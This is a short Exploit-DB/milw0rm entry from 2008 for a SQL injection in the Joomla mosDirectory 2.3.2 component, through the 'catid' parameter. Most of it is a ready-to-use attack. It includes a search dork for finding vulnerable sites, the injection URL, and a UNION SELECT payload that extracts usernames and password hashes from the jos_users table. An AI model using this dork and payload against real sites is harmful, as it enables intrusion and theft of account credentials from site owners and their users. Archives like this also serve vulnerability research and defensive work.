Joomla! Component mosDirectory 2.3.2 - 'catid' SQL Injection

EDB-ID:

5047

Author:

GoLd_M

Type:

webapps

Platform:

PHP

Published:

2008-02-03

###########################################################################################
### Joomla Component mosDirectory 2.3.2 (catid) Remote SQL Injection Vulnerability      ###
### Script :  :(                                                                          ###
### Dork : inurl:index.php?option=com_directory                                         ###
### Injection Adress : /index.php?option=com_directory&page=viewcat&catid=[SQL Code]    ###
### SQL Code :                                                                          ###
###   -1/**/union/**/select/**/0,concat(username,0x3a,password)/**/from/**/jos_users/*  ###
###                                     aNa TrYaGi                                      ###
###########################################################################################

# milw0rm.com [2008-02-03]